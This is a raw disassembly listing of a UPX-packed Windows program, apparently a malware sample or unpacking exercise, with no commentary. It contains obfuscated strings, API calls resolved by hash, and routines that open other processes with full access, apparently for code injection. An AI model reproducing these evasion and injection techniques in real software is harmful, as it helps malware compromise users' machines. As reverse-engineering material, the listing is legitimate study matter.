push offset aMHMSmM ; "MÃÇÉHÆMÆèMÃM"
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_4014AE
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_402B4E
cmp dword_404104, 9Ch
jge short loc_402AFF
inc dword_404104
loc_402AFF: ; CODE XREF: sub_4029EF+108�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
cmp esi, ebx
jz short loc_402B4E
push ebx
push esi
push offset sub_40286B
call sub_4024C7
add esp, 0Ch
cmp dword_404104, 0CBh
jge short loc_402B3D
inc dword_404104
loc_402B3D: ; CODE XREF: sub_4029EF+146�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_402B4E: ; CODE XREF: sub_4029EF+BE�j
; sub_4029EF+FC�j ...
xor eax, eax
jmp loc_402D23
; ---------------------------------------------------------------------------
loc_402B55: ; CODE XREF: sub_4029EF+92�j
; sub_4029EF+A3�j ...
push edi
xor edi, edi
inc edi
push edi
call sub_401117
pop ecx
pop ecx
push esi
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push ebx
call eax
push 0D89AD05h
push edi
call sub_401117
pop ecx
pop ecx
call eax
cmp dword_404104, 0D4h
mov esi, eax
jge short loc_402B8D
inc dword_404104
loc_402B8D: ; CODE XREF: sub_4029EF+196�j
push 80DBBE07h
push 6
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+arg_4]
push ecx
push 20h
push esi
call eax
test eax, eax
mov esi, offset dword_404108
jz loc_402C54
push 10h
push esi
push offset aVmMElKKMlm ; "VMÝMÎEL×ÆKÄKÉMLM"
call sub_40102E
push 1B3D12B9h
push 6
call sub_401117
add esp, 14h
lea ecx, [ebp+var_8]
push ecx
push esi
push ebx
call eax
test eax, eax
jz short loc_402C54
push 31h
pop eax
or ecx, 0FFFFFFFFh
loc_402BDF: ; CODE XREF: sub_4029EF+203�j
cmp ecx, 0A8h
ja short loc_402BE9
inc eax
inc ecx
loc_402BE9: ; CODE XREF: sub_4029EF+1F6�j
add eax, 2Dh
add ecx, 2Dh
cmp eax, 78h
jl short loc_402BDF
mov dword_404104, eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
push 7A2167DCh
mov [ebp+var_18], edi
mov edi, [ebp+arg_4]
push 6
mov [ebp+var_10], eax
mov [ebp+var_C], 2
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_18]
push ecx
push ebx
push edi
call eax
mov edi, [ebp+arg_4]
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push edi
call eax
mov eax, dword_404104
add eax, 0FFFFFFB3h
cmp eax, 99h
ja short loc_402C54
inc dword_404104
loc_402C54: ; CODE XREF: sub_4029EF+1BC�j
; sub_4029EF+1E8�j ...
cmp dword_404104, 0C7h
jge short loc_402C66
inc dword_404104
loc_402C66: ; CODE XREF: sub_4029EF+26F�j
push 8
pop ecx
push 0Ch
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset aMHMSmM ; "MÃÇÉHÆMÆèMÃM"
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_4014AE
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_402D03
cmp dword_404104, 9Ch
jge short loc_402CAD
inc dword_404104
loc_402CAD: ; CODE XREF: sub_4029EF+2B6�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
cmp esi, ebx
jz short loc_402D03
push ebx
push esi
push offset sub_40286B
call sub_4024C7
add esp, 0Ch
cmp dword_404104, 0CBh
jge short loc_402CEB
inc dword_404104
loc_402CEB: ; CODE XREF: sub_4029EF+2F4�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
jmp short loc_402D03
; ---------------------------------------------------------------------------
loc_402CFE: ; CODE XREF: sub_4029EF+1E�j
call sub_401C5C
loc_402D03: ; CODE XREF: sub_4029EF+2AA�j
; sub_4029EF+2D9�j ...
cmp dword_404104, 66h
jge short loc_402D12
inc dword_404104
loc_402D12: ; CODE XREF: sub_4029EF+31B�j
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
call eax
loc_402D23: ; CODE XREF: sub_4029EF+161�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_4029EF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402D30 proc near ; CODE XREF: sub_4014AE+8�p
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_402D44: ; CODE XREF: sub_402D30+29�j
cmp ecx, eax
jb short loc_402D52
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_402D52: ; CODE XREF: sub_402D30+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_402D44
sub_402D30 endp
; ---------------------------------------------------------------------------
align 4
dd 0A9h dup(0)
dword_403000 dd 77E73167h ; DATA XREF: sub_4014AE+299�r
; sub_401C5C+12C�r ...
dword_403004 dd 77E76A2Eh ; DATA XREF: sub_4014AE+1DD�r
; sub_4014AE+25E�r ...
dword_403008 dd 77E74672h ; DATA XREF: sub_4014AE+157�r
; sub_4014AE+1A3�r
dword_40300C dd 77E74155h ; DATA XREF: sub_4014AE+2B7�r
; sub_4017D5+80�r ...
dd 0
dword_403014 dd 77D4C96Ah ; DATA XREF: sub_401C5C+104�r
; sub_401C5C+649�r ...
dd 0
; ---------------------------------------------------------------------------
loc_40301C: ; DATA XREF: sub_401117+A9�o
inc esi
retf
; ---------------------------------------------------------------------------
dw 0C94Dh
dd 0E8E666C9h, 0C9C9CDh
dword_403028 dd 49C9C645h, 0CDE8C848h, 0C9C9h ; DATA XREF: sub_401117+9A�o
dword_403034 dd 4BC84B44h, 0E8C54DC8h, 0C9C9CDh ; DATA XREF: sub_401117+8B�o
; sub_401C5C+14�o
dword_403040 dd 0C74F46C7h, 0C9CDE84Bh, 0C9h ; DATA XREF: sub_401117+7C�o
dword_40304C dd 4FC4CD4Fh, 0E6664BC7h, 0C9C9CDE8h, 0 ; DATA XREF: sub_401117+6D�o
dword_40305C dd 46C64DC4h, 0E8C8484Bh, 0C9C9CDh ; DATA XREF: sub_401117+47�o
; ---------------------------------------------------------------------------
loc_403068: ; DATA XREF: sub_4014AE+2A2�o
rol byte ptr [eax], 0
loc_40306B: ; DATA XREF: sub_4014AE+222�o
add [esi-3Ch], al
dec esi
retf
; ---------------------------------------------------------------------------
dd 0E8C54648h, 4DC34Dh
dword_403078 dd 67C64DC4h, 63h ; DATA XREF: sub_4017D5+6B�o
dword_403080 dd 61CD4BECh, 0 ; DATA XREF: sub_401C5C+7AB�o
dword_403088 dd 0CD484EECh, 61E64Dh ; DATA XREF: sub_401C5C+6DC�o
dword_403090 dd 456Dh ; DATA XREF: sub_401C5C+62F�o
aJcnHSOAoFcdNhM db 'JCNÉÅÎHÅÂèÇËÇ`OÍÄaOÍÄäcdìNHÍMga',0 ; DATA XREF: sub_401C5C+5E4�o
aIDDmmhhc db 'IÊDÆDMMHHC',0 ; DATA XREF: sub_401C5C+54D�o
align 10h
aDIIeS db 'ÄDÊÆIÆIEÆèÇËÇ',0 ; DATA XREF: sub_401C5C+4DE�o
align 10h
aJjFhOjs db 'JJÉÇÃFHÊOJèÇËÇ',0 ; DATA XREF: sub_401C5C+472�o
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
db 4Ah, 0C7h, 4Ch
; ---------------------------------------------------------------------------
dec eax
retf 0E8C3h
; ---------------------------------------------------------------------------
dd 0C7CBC7h
dword_4030EC dd 464ACC46h, 48464D4Bh, 0CBC7E843h, 0C7h ; DATA XREF: sub_401C5C+39A�o
dword_4030FC dd 0C7CC49C5h, 0C7E84949h, 0C7CBh ; DATA XREF: sub_401C5C+32E�o
dword_403108 dd 44CC4FCDh, 4B4Dh ; DATA XREF: sub_401C5C+2D4�o
dword_403110 dd 0E24Eh ; DATA XREF: sub_401C5C+292�o
; sub_401C5C+35D�o ...
aEignIsOAoFcd db 'ÇÍEIGNÂIèÇËÇ`OÍÄaOÍÄäcd',0 ; DATA XREF: sub_401C5C+260�o
aNt db 'NâÑ',0 ; DATA XREF: sub_401C5C+229�o
; sub_401C5C+598�o
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
aThhcFIOsKHHlfh db 'ÅÅÇâhhCÌFÈÂIÍÇÅOèÎKÂhÇÆHLFhJÄHÉËÆh',0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
aThhcCgGnlsJhHl db 'ÅÅÇâhhCÌÃCGËÎGNLèËJhÇÆHLFhJÄHÉËÆh',0
align 4
aCSmM db 'ÑÊÌÌCÄèMÃM',0 ; DATA XREF: sub_401C5C+1C4�o
align 4
loc_403184: ; DATA XREF: sub_401C5C+1AA�o
ror dword ptr [ecx-35h], 1
dec edx
inc esi
retn
; ---------------------------------------------------------------------------
dw 4DC4h
dd 0C34DE84Dh, 4Dh
dword_403194 dd 0C84A4FD1h, 0CD4DCECCh, 0C34DE84Dh, 4Dh ; DATA XREF: sub_401C5C+190�o
dword_4031A4 dd 0CDC6C6D1h, 46C94EC3h, 4DC34DE8h, 0 ; DATA XREF: sub_401C5C+176�o
dword_4031B4 dd 0C5C64ED1h, 0C34DE8CAh, 4Dh ; DATA XREF: sub_401C5C+15C�o
dword_4031C0 dd 4ECCC7D1h, 4BC3C8CCh, 0C34DE84Fh, 4Dh ; DATA XREF: sub_401C5C+142�o
dword_4031D0 dd 4A4DCBD1h, 4DE8CAC5h, 4DC3h ; DATA XREF: sub_401C5C+122�o
dword_4031DC dd 0CD6Dh ; DATA XREF: sub_401C5C+F2�o
dword_4031E0 dd 0D1E25Eh ; DATA XREF: sub_401C5C+C4�o
dword_4031E4 dd 0C8C64D4Ah, 0E666C94Dh, 0C9C9CDE8h, 0 ; DATA XREF: sub_401C5C+50�o
dword_4031F4 dd 0C64D4645h, 0CDE8E666h, 0C9C9h ; DATA XREF: sub_401C5C+36�o
aVmMElKKMlm db 'VMÝMÎEL×ÆKÄKÉMLM',0 ; DATA XREF: sub_4029EF+1C5�o
align 4
aS db 'ÈÅÍÉÉèÍÉÉ',0 ; DATA XREF: sub_4024C7+10A�o
align 10h
aYoKmdxVmnKh db 'ØÅYOÇÔKMDXÌVMNÅKHÈ',0 ; DATA XREF: sub_4024C7+EF�o
align 4
aFNHfSmM db 'ÑFÄNËHFÅèMÃM',0 ; DATA XREF: sub_40286B+8B�o
align 4
aMHMSmM db 'MÃÇÉHÆMÆèMÃM',0 ; DATA XREF: sub_4029EF+D4�o
; sub_4029EF+282�o
align 4
dd 36Bh dup(0)
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_40246F+F�o
; sub_4029EF+173�o
align 4
dd 3Ah dup(0)
dword_404104 dd 92h ; DATA XREF: sub_401117+3�r
; sub_401117+15�w ...
dword_404108 dd 6C64746Eh, 6C642E6Ch, 6Ch, 3Dh dup(0) ; DATA XREF: sub_401117+41�o
; sub_401117+67�o ...
byte_404208 db 1 ; DATA XREF: sub_401304+34�r
; sub_401304+74�w
byte_404209 db 1 ; DATA XREF: sub_401304+26�r
; sub_401304+42�w
align 4
dword_40420C dd 0 ; DATA XREF: sub_40286B+10F�o
; sub_40286B+12F�r
dword_404210 dd 0 ; DATA XREF: sub_40286B+129�r
; sub_40286B+146�r
align 2000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 406000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_406000 dd 58h, 2000h, 74736C01h, 79706372h, 6C010041h, 63727473h
; DATA XREF: start+1�o
dd 4169706Dh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 650000h, 20140000h, 77010000h, 69727073h
dd 4166746Eh, 0
dd 1FF00000h, 62B1301h, 6090620h, 6090609h, 0F0D0609h
dd 11231E11h, 37375D21h, 2B0F0706h, 0C060806h, 931100Fh
dd 0C060930h, 10454864h, 600C1816h, 0A4C2510h, 150C0609h
dd 0C06091Dh, 28133D0Ch, 13651608h, 16063C20h, 0C060C06h
dd 0C060C43h, 0C411054h, 94F927Dh, 102D0C06h, 0C060959h
dd 2206753Fh, 609181Ah, 2905410Ch, 80C0913h, 1A1A150Bh
dd 331A1A1Ah, 371A0A0Eh, 2F5A4232h, 323A323Dh, 353A323Ah
dd 10344B3Ah, 15064B08h, 2C381545h, 91B1909h, 2E1D0C06h
dd 702B1339h, 4E1A1E16h, 0B0C0609h, 34081306h, 3709330Ch
dd 443F110Ch, 0D430E0Ch, 0D500C06h, 9300C06h, 0C340C06h
dd 1606381Eh, 61B0C62h, 0A161205h, 150B8066h, 0E240C16h
dd 0E182A0Ch, 4B400E1Eh, 100C0610h, 240C1615h, 91E0C0Eh
dd 455000h, 4014C00h, 44A58600h, 46h, 0
dd 200E000h, 8010B01h, 1E0000h, 0C0000h, 0
dd 29EF00h, 100000h, 300000h, 40000000h, 100000h, 20000h
dd 400h, 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000004h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 325400h, 3C00h, 6 dup(0)
dd 500000h, 1EC00h, 0Ch dup(0)
dd 300000h, 1C00h, 6 dup(0)
dd 65742E00h, 7478h, 1D5B00h, 100000h, 1E0000h, 40000h
dd 3 dup(0)
dd 2000h, 64722E60h, 617461h, 30200h, 300000h, 40000h
dd 220000h, 3 dup(0)
dd 4000h, 61642E40h, 6174h, 21C00h, 400000h, 5 dup(0)
dd 4000h, 65722EC0h, 636F6Ch, 22A00h, 500000h, 40000h
dd 260000h, 3 dup(0)
dd 4000h, 500042h, 32AC00h, 504A00h, 51390000h, 7C600000h
dd 208DFBFh, 83C0940Fh, 0A20F403Dh, 0CD527C3Fh, 81D8C3F7h
dd 0A55F613h, 1E0B05C7h, 183C60C9h, 8651851Fh, 83A23DACh
dd 34BC6EDBh, 0FF337B53h, 8B347h, 5017B0F7h, 0BEBE917Ah
dd 99A4299Dh, 6025758Fh, 8BB6FECFh, 0D88B7357h, 3974DB85h
dd 397D4B6Fh, 0FD87F37Fh, 0C9438568h, 4D8D28FDh, 755351FCh
dd 0A84268FCh, 0B3B09E6Fh, 561661DDh, 385FEB13h, 9981A30Eh
dd 15DDB901h, 66D60E73h, 74006AEEh, 6A167A48h, 0B0DF0AFFh
dd 0D5684BEFh, 28723EB0h, 99E2035Bh, 2DD859A4h, 85FE6B53h
dd 0ECC22C17h, 6CF8025Bh, 682FEB7Ch, 0B08F0834h, 105B39B5h
dd 5E1318B8h, 0F859A499h, 1F6A2C1Dh, 27BC12ADh, 7910DF0Ah
dd 21AE3D27h, 4393E868h, 0E1739B77h, 0BB47C0EBh, 0E89553B9h
dd 0DF849DFCh, 9B9AAF35h, 6A8AC490h, 51F40F05h, 2DAE8456h
dd 21221050h, 79A7B7ECh, 6085CA10h, 0EC850287h, 0DDEEC43Dh
dd 0F7D6011Fh, 0FF4BF445h, 2561860Fh, 0A71DDFB6h, 8BB092BFh
dd 853F85B4h, 24383CF6h, 3A609CC1h, 381B8593h, 0DAF3ACCh
dd 10684B6Fh, 0DD4A95B2h, 538F0004h, 0FE3C41BAh, 0E049DB77h
dd 755D5056h, 0CDD47F8h, 0DA16C968h, 9FD80DB6h, 0C2ECAC18h
dd 0A6F00504h, 0D67927ACh, 1B8A920h, 0B3CC3DDDh, 0FFB243Ch
dd 9168F075h, 3CE4FB21h, 0EB3EFE03h, 3B56D63Ah, 845358Bh
dd 0D6FF5077h, 0F9BBBD8Ch, 0BD806D4Ah, 0F3A10E9h, 0EA0C6085h
dd 0D2CCC9FFh, 8B2A535Ch, 4E01EBF0h, 0B835BC80h, 0E7F1DBDh
dd 5F5755Ch, 424B15FFh, 0E4854D7Eh, 140CE42h, 0F6376EE8h
dd 848D31DDh, 39506735h, 0F0857C04h, 22BB6718h, 8084460Fh
dd 0F4CCC07h, 2172034Fh, 0BBF17BFh, 81E4FF21h, 76C7157h
dd 6A8A94F7h, 0D984E907h, 51E82885h, 0E485D6F4h, 0DD33364Fh
dd 80CEFCC7h, 37577374h, 93647869h, 0FFD66074h, 6F90DB51h
dd 59990376h, 7FFD3A33h, 0F358101h, 2AB96823h, 5CE61D57h
dd 680CFE12h, 20E4E9EDh, 921A8BF4h, 58C59213h, 0F7961DF4h
dd 5B1A06F6h, 2E8C100h, 820F0539h, 92652EA4h, 496A6366h
dd 2DA108F2h, 0E4462935h, 0E8A83D2Dh, 0C1EDE026h, 87CD0F8h
dd 0DB33530Ch, 0B73DC227h, 46DFC65Ah, 0EC02FC94h, 0D0E045C7h
dd 0E8DC1C07h, 4A295068h, 8477567Ch, 7FF842F7h, 816853B2h
dd 6A0534D4h, 0E8758903h, 0BC68C540h, 493322DEh, 80E490ECh
dd 8478EF8Ch, 0B085C8F7h, 7008B29Dh, 0C9A3B5E4h, 250CEDFAh
dd 3DD768B4h, 4B210859h, 7330FFh, 0BD661668h, 1557B87Dh
dd 23F6B3F4h, 75651C60h, 0CD601BF4h, 5A60215h, 68144832h
dd 0F61D2CB6h, 1AD09C78h, 0E037575Dh, 908E4002h, 6182C01h
dd 20F20305h, 3DF95D45h, 0C30368C3h, 0E027F86Eh, 58572F5Ch
dd 0A6FC7D89h, 0BA107E5Ah, 2168A1A7h, 8DECCD20h, 58FBFF88h
dd 0D5D0B85Fh, 6F8FDEBEh, 12F870Fh, 7E49E1Ah, 0F114A872h
dd 685308F8h, 0A15B2C80h, 53571BEDh, 404868B0h, 0C34E180Ch
dd 0F0F056B6h, 96D0FBABh, 0AE27DA10h, 0B0212962h, 0FC687FADh
dd 4556C34Eh, 2A6A7EFBh, 2F12DEC5h, 95D43CD1h, 0BEC05AC1h
dd 658165BDh, 19191624h, 3BED7F74h, 0EB3D18FEh, 74CB3A64h
dd 0C368EA65h, 850F3FD1h, 6D977593h, 0D8D0DC69h, 0F052DC48h
dd 730D85BDh, 93828588h, 846D75BEh, 39808385h, 6A977720h
dd 9A499658h, 89FAFF05h, 85B1919h, 0B86E5904h, 7EEFFD6Fh
dd 0C052EB1Bh, 3FE3DFEh, 5D880930h, 3A04EB10h, 332874C3h
dd 769B0581h, 0C8C06F26h, 0D4C67185h, 9629062Ch, 0CFD2A40h
dd 14FB0C1Ah, 0CBE183FCh, 211D908h, 0B59A3DCAh, 0A4814A16h
dd 1B63D77h, 791F8790h, 0CBF16880h, 0F052AEF7h, 0D8B3096Ch
dd 0EA69ECD4h, 0D2D9C85Ch, 5B0E4F7h, 0C0FFC5D0h, 55252180h
dd 0DC553BECh, 0B75D0F74h, 0E40ABF0Ah, 38097D05h, 0FCB0D714h
dd 6C854E27h, 59342EB5h, 83BB290Bh, 93C96850h, 8C044BA8h
dd 0B446EEF1h, 743A51EBh, 9FC28149h, 0C2ADDCFAh, 6A3B77FFh
dd 88458D40h, 44842DDCh, 0F4658D35h, 8AC7E313h, 0E4C54631h
dd 9AB58B97h, 0F84C8h, 0EB0E18E5h, 0BB4C351Bh, 0FFC88303h
dd 9039B886h, 8C62E132h, 0F5203411h, 9ABF19D6h, 14534357h
dd 28D7E46Ch, 0F42121E5h, 4AC21957h, 0E40C2646h, 172033D9h
dd 16D91072h, 0FC6A5092h, 7A813811h, 67A2AB33h, 0DA161637h
dd 0D8FE5052h, 0D8B02528h, 21231059h, 88AB290Bh, 0AC630C1Dh
dd 89E073C1h, 0E0BB9754h, 0ECDEE12Eh, 570067h, 551DC00h
dd 5F23229Fh, 2ADC02A1h, 6939B845h, 0A56813Bh, 0E9182A14h
dd 60C8E084h, 8BD0EB01h, 34B9FB3Dh, 564340F0h, 6AD7FE48h
dd 720C1F0Dh, 19C01916h, 0C8320958h, 68B48C80h, 361360Ch
dd 4D78A432h, 32031994h, 84880321h, 0C8C80C98h, 0A8780A20h
dd 9F8978CEh, 19FB8166h, 616848Dh, 0DC09018h, 95027BAh
dd 8B5A210Ch, 0F63A5B1Dh, 0E07DFC8Fh, 6A0A7500h, 0EB544022h
dd 0D864231Bh, 301901C9h, 1903FC48h, 0C81C886Bh, 5040FD2Ch
dd 0C16E4E0Ch, 362FD30Eh, 0D017FEB8h, 14464059h, 0BB30D319h
dd 34D7AF65h, 0D107212Bh, 41B0D9D8h, 2531109Fh, 26C8CD56h
dd 0D87DE85Ch, 605A757Fh, 19006473h, 1080619h, 0B074BB9h
dd 6811E9B8h, 73E4081Dh, 200A5991h, 6E0832FCh, 365ECA58h
dd 648B9118h, 0D886B5Bh, 9021B5E7h, 6E6301ECh, 601C9172h
dd 910B986Bh, 0E032005Ch, 32005C68h, 78D00E72h, 20071815h
dd 8C09C043h, 6EB2B903h, 6D1EA80Ch, 0B400E408h, 95376B03h
dd 9324725Eh, 8FFF127Fh, 8C0F0289h, 0B8769221h, 14894F6Ch
dd 203B6E54h, 0D2F5060Fh, 1F6AAD3Dh, 2BFA3296h, 0E2689419h
dd 0EB270118h, 0C1C06817h, 6B4D1F27h, 32F25945h, 0EC9206C9h
dd 0C23D0A0Ah, 21AEC096h, 904ABF1Bh, 2C876B57h, 0D07F0B70h
dd 8AF84450h, 6E1BFFEBh, 0A51D040Ah, 0F97D80h, 75ED4588h
dd 0EF45C606h, 6B665930h, 0F9165BDBh, 0EF0F1304h, 36F25ED8h
dd 0E19265E4h, 0B73D1313h, 3497C859h, 0FCFCD217h, 8F2D1704h
dd 0ECFDCD3Ch, 1904FDEEh, 86D568EEh, 8EC29B0h, 0B09B18h
dd 7746B19h, 4B9888F7h, 649F6702h, 6DDF8AF6h, 6613B5DBh
dd 84840B8Bh, 67E572E4h, 0FECE8C2Eh, 37430E6h, 3CE66588h
dd 0B7B7E011h, 524859B2h, 0C8DB52D8h, 0E7FCC832h, 0E4CEE4E4h
dd 25CF2325h, 638004E8h, 1263C091h, 81F1757h, 36AD06EDh
dd 1910943Dh, 936902Bh, 3A95925Ah, 177FA7C0h, 0DFBFFEC1h
dd 5781F0F0h, 301319h, 2C6832EBh, 21BFEC81h, 2C1297D9h
dd 7402F831h, 72F56826h, 92143D99h, 689E09A0h, 571F03E8h
dd 0FC5B8B34h, 0C574DC50h, 0C25E6F5Fh, 8C9BEAADh, 20106A45h
dd 88DEDF0Fh, 0E7A258E6h, 0E389C803h, 8B18418Dh, 0DA290705h
dd 0D3083870h, 36C93DFBh, 89C7D12Ah, 0B0E4ADB8h, 0F16B51B6h
dd 0A08B638Ch, 0FF595F8Eh, 4D63FDB5h, 0F8B5091Dh, 1BDFF733h
dd 3CE783FFh, 4C237420h, 0E13D8CF9h, 4BD4CDF9h, 0A25B77Eh
dd 0AC5356EFh, 6E2BBF79h, 0C33BD0E0h, 3207759Bh, 6862180Fh
dd 17CD9430h, 5B2DAACh, 25800024h, 82582D09h, 0E824A2DCh
dd 0C85C80CFh, 121BBD09h, 424E12F0h, 0AE202245h, 5D90BC45h
dd 9801831h, 4E142272h, 682FEDC6h, 1FC0EAEEh, 9FF08B11h
dd 170551BCh, 1340849Ah, 0E07DF006h, 2F87755Eh, 0F801C6E4h
dd 0C2D8F0ACh
dd 2C0C6358h, 7D8BB4E0h, 67CCCEE8h, 7F1C64AAh, 0EA513EEAh
dd 3BC9468Dh, 144886C9h, 0F48EAD03h, 396AFCDFh, 58EA6A5Ah
dd 42908E3Dh, 6D226940h, 0E4178854h, 4491A25Dh, 920B7F8Ah
dd 0C72BC68Bh, 0C60FFA83h, 30ACB919h, 14E0B39Dh, 7C4BFFCh
dd 0C7033441h, 0BE8D38A5h, 78810975h, 9078B06h, 2D1BFDBBh
dd 0ED6703FAh, 302408Bh, 0EB1A0C41h, 0AD8A590Dh, 0EB087FFBh
dd 39664001h, 40FA7518h, 58EF0540h, 0DB6A370Eh, 0C4922C9h
dd 0F322F8B4h, 0FFDB397Ch, 8AFCF577h, 30E44008h, 73F0F980h
dd 0C9B60F07h, 0FEBF903h, 6D1A10AFh, 0E183FF6Bh, 10E1C10Fh
dd 3E0ECA0Bh, 0D040BA8Bh, 26C77A04h, 56A6D975h, 2030585Eh
dd 2B79C253h, 56FFE375h, 8759F37h, 0FE8B1068h, 0B3685775h
dd 12E61874h, 2E653492h, 430CEB53h, 53340608h, 85DF7B59h
dd 0D50CA0E0h, 7961D4FAh, 2737F8ADh, 686DEB20h, 0AA1DE02Fh
dd 1592646Ah, 99F081ADh, 9F644002h, 10E57CADh, 0C82310EFh
dd 1672BD89h, 0FDA0CAC0h, 0E00A6E1Fh, 97575247h, 0CD95672Fh
dd 90590877h, 26A18EB0h, 812438ACh, 93BCC702h, 8A42ED05h
dd 1C4C956Ch, 8014D4A9h, 43DD6757h, 9D49C953h, 2307D087h
dd 0BD48C08Dh, 9AF0986Bh, 0FCB76FB8h, 25C176D6h, 147757E3h
dd 0F695066Fh, 530C648Fh, 374AE5D2h, 0A25949A1h, 44E29B3h
dd 0FEB4CE01h, 4BD602F0h, 0EE342271h, 0E0D9A41Eh, 196AB559h
dd 0D9ACA46h, 16997910h, 12B43D16h, 4347DBBCh, 58B85796h
dd 92DA3205h, 0E605B5CEh, 0AE396A66h, 65E4403Ch, 863D0F0Fh
dd 0EDB35339h, 83D20602h, 0B8CC0C32h, 155ECDDh, 0D2A44780h
dd 0C6EDD9FFh, 101A35BAh, 0C250C05h, 0C314685Ch, 912EC7ECh
dd 1C8B1632h, 88BF3B68h, 82C3E37Bh, 7DC23493h, 305455Eh
dd 0A260F8CBh, 6653768Ah, 674C8126h, 3C27021Eh, 42C4F501h
dd 5A214381h, 7B923958h, 5DB56CC2h, 0D248EB89h, 996813C7h
dd 2E2EBDA4h, 68242657h, 5754BFA0h, 88EDBE9Ch, 4F631DB3h
dd 0C9331B8Dh, 6FEEC56Fh, 8D1574D7h, 10C50D94h, 3187A80h
dd 17DD5589h, 41FCF44Ah, 0BCDBC83Bh, 20B8118Bh, 6A2E0B00h
dd 0FAED0BF5h, 6C707865h, 0CFED7F37h, 518BEFF2h, 726F1004h
dd 49BD7265h, 83C80B08h, 0B6D8AFDBh, 1065222Eh, 480C0FACh
dd 82D9B09h, 0C70130A5h, 1F8101D4h, 0C87D756Eh, 0ABF344CCh
dd 5EEC6F0Eh, 1609C890h, 3B1EAA04h, 214F59F3h, 6174D023h
dd 68539C88h, 3F0A1BFFh, 881F0FC7h, 2332742Fh, 346B187Dh
dd 3D21B390h, 8650FACBh, 0FE861184h, 87071F1Dh, 4C9C2644h
dd 20B5E368h, 505A26Fh, 0E0D89ADh, 25B593EAh, 74F6CE5h
dd 0C580DBBEh, 64D193E0h, 6A510CE8h, 0C059E720h, 9DED8850h
dd 8210E274h, 193F60h, 1B3D12B9h, 0A247F130h, 51F88F7Dh
dd 6A7B18C3h, 0C9835831h, 1B0185C4h, 78D6A86Bh, 262E0308h
dd 0DA726CEAh, 0EA6F4B02h, 7A2167DCh, 0C21E85Eh, 46E65949h
dd 0F4DC9D0Bh, 39CCBD02h, 53F8629Ah, 92F02043h, 572E210Fh
dd 993DB30Ch, 0C2720211h, 45B2C728h, 0AD0850C8h, 55D13668h
dd 0DEB39C8h, 8128580Ch, 663B93C5h, 3FFFB97Dh, 0C279B3F6h
dd 0CC000Ch, 244C8D51h, 1BC82B04h, 23D0F7C0h, 0B28DFEC8h
dd 66C48BC5h, 0A72D8F0h, 9459C18Bh, 55B45D8Bh, 2D3A522Dh
dd 0D8458540h, 9AF028Fh, 0FD00005Bh, 4641FFDBh, 0C9C94DCBh
dd 0CDE8E666h, 0C6450005h, 0C84849C9h, 8FB763F6h, 4B44000Ah
dd 0C54D01C8h, 4F46C70Ch, 0BE164BC7h, 7EE60Bh, 0CC4CD4Fh
dd 4DC40030h, 0F74B46C6h, 34C1BBF6h, 0C4460FC0h, 4648CB4Eh
dd 4DC34D37h, 0F7FEDD1Bh, 136367EEh, 61CD4BECh, 484EEC2Bh
dd 0AE64DCDh, 0BAEE456Dh, 4A0BBFFFh, 0C5C94E43h, 0C2C548CEh
dd 0C7CBC7E8h, 3615560h, 0DE6463E4h, 23C65FFDh, 44CA4967h
dd 4D4D44C6h, 63434848h, 49C6CA44h, 0D6BDDFFBh, 472B9E01h
dd 0C7C94A4Ah, 0CA4846C3h, 6D104A4Fh, 0C33F6D8Fh, 0D4CC74Ah
dd 0CC460CC3h, 0FB4D8F4Ah, 1CB60FECh, 49C52B43h, 4949C7CCh
dd 0CC4FCD0Ch, 0DBFEC852h, 4E074B6Dh, 0CDC703E2h, 4E474945h
dd 0FF7E49C2h, 1B5DFFF6h, 0C5CB00D1h, 68E2C7C5h, 46CC4368h
dd 0C7CD20C8h, 0CEE84FC5h, 7C5BFB4Bh, 0C6DCC289h, 77464C48h
dd 0CBC948C4h, 432368C6h, 0C32FEDF6h, 0CECB4743h, 0CBE84C49h
